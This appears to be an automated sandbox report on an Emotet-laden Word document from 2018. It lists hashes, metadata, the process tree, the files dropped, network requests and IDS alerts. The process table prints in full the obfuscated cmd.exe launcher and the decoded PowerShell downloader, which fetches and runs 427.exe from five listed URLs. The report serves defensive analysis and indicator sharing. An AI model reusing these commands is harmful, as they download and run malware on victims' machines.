File name: | FA0039_14.doc |
Full analysis: | https://app.any.run/tasks/aa1cdc47-8f55-43da-90b6-a2742a2d6e48 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 15:44:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 3 16:09:00 2018, Last Saved Time/Date: Mon Dec 3 16:09:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 27, Security: 0 |
MD5: | 5DB3E60394D1E758FD885EDB9418C1FC |
SHA1: | 92A266FF19E7E23957EF172F10A93F9793C2ADD6 |
SHA256: | 47B6436CE1408594952CF1CDDE2EDFFC0E5CEA52352450D801FA586ED129D512 |
SSDEEP: | 3072:/Rp8GhDS0o9zTGOZD6EbzCdfHyt20rBCU9:/xoUOZDlbefEZrBCU9 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 30 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 27 |
Words: | 4 |
Pages: | 1 |
ModifyDate: | 2018:12:03 16:09:00 |
CreateDate: | 2018:12:03 16:09:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2988 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA0039_14.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
4056 | c:\pJLlhvXw\JQWXulfJpVDw\zlQwGwnf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set jzNy=F# ;]C:'PwiT=^<iK^<:di hX': H=(kPqsA/am7nQ*7S$,8d}P =}Uew{Z}@h%;#cB]atJD,aQZnc'O^|}TZ^&}/^>y;-cJk-b^&ad#oeiK]r-sDb7)e;cZV'7t:bx9gmA:DUYa)'^&Tq=Mm;d+a?P;9Ak^&af$UVo;{`=cm^>%Ej.WJ E^|3bb5484c-acd3-5883-ae5d-000aa204eed3 #Q \0Fm5]be~(Ptf)kIwO^>-mB3eC(0kK@vo-zJvYCHn0wjI^>$E{ q: d.E)3/P0beH0atN0=Pa0*^>e8`J6 z{Ne.#+gzTy-e^&w ^<U8hvK,tG)_g2l_nHgBeGJblkHE.b.^>)SLpcv}*EhACJWIN$,.t @=$mnsDeesXto^>9IV,F-3Qjt(@ueS{zG`;^>(s}n(dya G:1f\ ^>If(7;1=7'2*iF:0{Ze3^<E/L6'`,X=?BPJIW^&aZ+xU6j1$RiC;BIv)y'IcjD3EKP=JCl5$^>+ ARr,z-PP0i6q:%`i:?2$f%\(tW^|e-uwlVQIi~\1FPo3d5[ca3;yoL=~lsR^>n?@awOiLoJe~DrdA.D@uSqIDET}fR/*N$X}`{%pMy(^|vr{L(t4x-{d8q)Qqpi8SJBIz$fHG~$k? ]lyn;7KiD^<g [shP^>*LqL$liJm^|$9uN(Nd[h;-Rcqn]a8Kqeso-r6/Dou[7fH4l;%}c'8%reEzXxT1Le`a0.osL'bZa+4-ZDRW^>i8Z[FCFK$6nU+u%V'-0:\s{5'^|CW+*V=p@Z^|m}*oelxgt[`}:m'YvWx^|nakJeQE:$4Du=`xvc^>PtEf}_JvA%$jD};GIu'ECXd6[jPl%-Yvbf'M,%=t1NoxB2MWjkD;e)$Pm_;%wr'/;'778g2yLJ4OrD'} c io'=V=Y 6-{DQ^|.i(s^&FgA6$y{F;M5e'P?FFDr9q]:Vp~S;'HEm=1,OL-{poUw^&TZWF$twa;~lH)VAg's U@KWO'K-^|(3@Bt$@yiDaJlfCnp/.`SHS^|.i^>6'I^>~tno8RLw?1+b$3-^<hhdirNPu2DQzC/{0_eh15bx}P.NM]d`dYifw@rUi}gj.dt+:ir/76a^&FctbtosW^&^>/s'0/b^&~:0_@pPYOt}/ft:l2hu@]@gGVs?\^<OQCmD(e:yNFkifHbsr'^<mm/xWr8HL.sPM23%/D^>^|s`x+e-?Lg8p4agl;m(ghiRa%/R{dlU #pGWJ..,8n-p`alP4b6\0rQT-uuVEaV4;iP01w7;Jl9I#y8'HstkY/C.f/0Gw:_P=p,uzt;jftRgOhfK'@Ckc7:q+aRzsQ^|c3K[q 8OIwzJTDipAF/1tws-BZeU'0.*1^|rlt8oj'id)@'n?M euC}l_J+pny;s$;z/rLG/4U+:RW1pif]tT}Utb=)hgqM@2H}j:hbuyC47^&:SP0u?lk[=aJ$]L69cMGYqX*^&ImkFf/s\Ws[n\eL;A.~?TsyPHem$QtqOWi[znseKWnd^&_eF?/vk}Jeu]ls^|dM/'uT/ld{:QZwp9(ltJxmtwV9hm^&1@4mWM}5z70SCH?DoCG:}T'rTwohJKI$/Ss QFc^|vG=gG/w=YmkiLoRn_cD`3.Qtzs*:ue{JqmAO7iI'[tGf(ej*Ofv]jaRO+t^|i^<nK.Da:JlsKka/IPp/O'M:*]fp]F0tZ)At8=ehiC/'2po=9kgi(n]BQ-lfl:?$~$G;#1tthlznxPAeBnhib^>^<le^<vCh#wb9d[e7T,W\uU.uPqtuNOeL,UNNHu 0]Mtx`ccC9BeP0^>jz]Hbg}^>o]Pr-R(Ww:5feaP{nvT`=IoeSX*ME1jWR4GT$3~e;s5\'Rv(MD#MExHKDkW5'^&SQ=-Var$ co(@nPHa`f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %p in (1791,-4,3)do set Nn=!Nn!!jzNy:~%p,1!&&if %p==3 echo !Nn:*Nn!=! |FOR /F "tokens=3 delims=Dyu.jM" %o IN ('assoc^^^|find "d1="')DO %o -"
| c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2640 | CmD /V:ON/C"set jzNy=F# ;]C:'PwiT=^<iK^<:di hX': H=(kPqsA/am7nQ*7S$,8d}P =}Uew{Z}@h%;#cB]atJD,aQZnc'O^|}TZ^&}/^>y;-cJk-b^&ad#oeiK]r-sDb7)e;cZV'7t:bx9gmA:DUYa)'^&Tq=Mm;d+a?P;9Ak^&af$UVo;{`=cm^>%Ej.WJ E^|3bb5484c-acd3-5883-ae5d-000aa204eed3 #Q \0Fm5]be~(Ptf)kIwO^>-mB3eC(0kK@vo-zJvYCHn0wjI^>$E{ q: d.E)3/P0beH0atN0=Pa0*^>e8`J6 z{Ne.#+gzTy-e^&w ^<U8hvK,tG)_g2l_nHgBeGJblkHE.b.^>)SLpcv}*EhACJWIN$,.t @=$mnsDeesXto^>9IV,F-3Qjt(@ueS{zG`;^>(s}n(dya G:1f\ ^>If(7;1=7'2*iF:0{Ze3^<E/L6'`,X=?BPJIW^&aZ+xU6j1$RiC;BIv)y'IcjD3EKP=JCl5$^>+ ARr,z-PP0i6q:%`i:?2$f%\(tW^|e-uwlVQIi~\1FPo3d5[ca3;yoL=~lsR^>n?@awOiLoJe~DrdA.D@uSqIDET}fR/*N$X}`{%pMy(^|vr{L(t4x-{d8q)Qqpi8SJBIz$fHG~$k? ]lyn;7KiD^<g [shP^>*LqL$liJm^|$9uN(Nd[h;-Rcqn]a8Kqeso-r6/Dou[7fH4l;%}c'8%reEzXxT1Le`a0.osL'bZa+4-ZDRW^>i8Z[FCFK$6nU+u%V'-0:\s{5'^|CW+*V=p@Z^|m}*oelxgt[`}:m'YvWx^|nakJeQE:$4Du=`xvc^>PtEf}_JvA%$jD};GIu'ECXd6[jPl%-Yvbf'M,%=t1NoxB2MWjkD;e)$Pm_;%wr'/;'778g2yLJ4OrD'} c io'=V=Y 6-{DQ^|.i(s^&FgA6$y{F;M5e'P?FFDr9q]:Vp~S;'HEm=1,OL-{poUw^&TZWF$twa;~lH)VAg's U@KWO'K-^|(3@Bt$@yiDaJlfCnp/.`SHS^|.i^>6'I^>~tno8RLw?1+b$3-^<hhdirNPu2DQzC/{0_eh15bx}P.NM]d`dYifw@rUi}gj.dt+:ir/76a^&FctbtosW^&^>/s'0/b^&~:0_@pPYOt}/ft:l2hu@]@gGVs?\^<OQCmD(e:yNFkifHbsr'^<mm/xWr8HL.sPM23%/D^>^|s`x+e-?Lg8p4agl;m(ghiRa%/R{dlU #pGWJ..,8n-p`alP4b6\0rQT-uuVEaV4;iP01w7;Jl9I#y8'HstkY/C.f/0Gw:_P=p,uzt;jftRgOhfK'@Ckc7:q+aRzsQ^|c3K[q 8OIwzJTDipAF/1tws-BZeU'0.*1^|rlt8oj'id)@'n?M euC}l_J+pny;s$;z/rLG/4U+:RW1pif]tT}Utb=)hgqM@2H}j:hbuyC47^&:SP0u?lk[=aJ$]L69cMGYqX*^&ImkFf/s\Ws[n\eL;A.~?TsyPHem$QtqOWi[znseKWnd^&_eF?/vk}Jeu]ls^|dM/'uT/ld{:QZwp9(ltJxmtwV9hm^&1@4mWM}5z70SCH?DoCG:}T'rTwohJKI$/Ss QFc^|vG=gG/w=YmkiLoRn_cD`3.Qtzs*:ue{JqmAO7iI'[tGf(ej*Ofv]jaRO+t^|i^<nK.Da:JlsKka/IPp/O'M:*]fp]F0tZ)At8=ehiC/'2po=9kgi(n]BQ-lfl:?$~$G;#1tthlznxPAeBnhib^>^<le^<vCh#wb9d[e7T,W\uU.uPqtuNOeL,UNNHu 0]Mtx`ccC9BeP0^>jz]Hbg}^>o]Pr-R(Ww:5feaP{nvT`=IoeSX*ME1jWR4GT$3~e;s5\'Rv(MD#MExHKDkW5'^&SQ=-Var$ co(@nPHa`f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %p in (1791,-4,3)do set Nn=!Nn!!jzNy:~%p,1!&&if %p==3 echo !Nn:*Nn!=! |FOR /F "tokens=3 delims=Dyu.jM" %o IN ('assoc^^^|find "d1="')DO %o -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2184 | C:\Windows\system32\cmd.exe /S /D /c" echo $Por='DEM';$RES=new-object Net.WebClient;$fBi='http://santafetimes.com/GFSKwTCH7M@http://sevensites.es/mXMLalP7uj@http://splendor.es/iz8KQa7@http://sylwiaurban.pl/images/MLWmsiyDOs@http://startgrid.be/DNh31Rt'.Split('@');$ToL='pqF';$FiD = '427';$DMo='YPd';$JEc=$env:temp+'\'+$FiD+'.exe';foreach($iqP in $fBi){try{$RES.DownloadFile($iqP, $JEc);$UaJ='EZF';If ((Get-Item $JEc).length -ge 80000) {Invoke-Item $JEc;$kPd='Umb';break;}}catch{}}$Qaq='iKT'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2272 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=3 delims=Dyu.jM" %o IN ('assoc^|find "d1="') DO %o -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2716 | C:\Windows\system32\cmd.exe /c assoc|find "d1=" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2944 | C:\Windows\system32\cmd.exe /S /D /c" assoc" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3064 | find "d1=" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3812 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3552 | "C:\Users\admin\AppData\Local\Temp\427.exe" | C:\Users\admin\AppData\Local\Temp\427.exe | — | powershell.exe |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: Windows Exit code: 0 Version: 7.6.7601.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6D32.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PGWW6A49N9CB5F2V6OGK.temp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~WRD0000.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~WRD0001.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFE72B5C1B397372CD.TMP | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF7FA0FC9E99940574.TMP | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ACC8F483-E3ED-4E61-B4DB-693B87133436}.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3CC152151E32DA97.TMP | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8C1A7498-E310-4B20-B3C7-42B35D0B7A8D}.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B6ECEC136F257DBEEC2A501813555CA9 | SHA256:F3B8DE5FAA34C54EB1DDA6A87A0F1EA2FF12E83AA4443628DFF63C18488F4D3A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3812 | powershell.exe | GET | 301 | 91.142.223.120:80 | http://sevensites.es/mXMLalP7uj | ES | html | 303 b | malicious |
3812 | powershell.exe | GET | 404 | 67.210.98.100:80 | http://santafetimes.com/GFSKwTCH7M | US | html | 442 b | malicious |
3812 | powershell.exe | GET | 200 | 91.142.223.120:80 | http://sevensites.es/mXMLalP7uj/ | ES | executable | 516 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3812 | powershell.exe | 67.210.98.100:80 | santafetimes.com | Lunar Pages | US | malicious |
3812 | powershell.exe | 91.142.223.120:80 | sevensites.es | Infortelecom Hosting S.L. | ES | malicious |
Domain | IP | Reputation |
---|---|---|
santafetimes.com |
| malicious |
sevensites.es |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3812 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3812 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3812 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3812 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3812 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |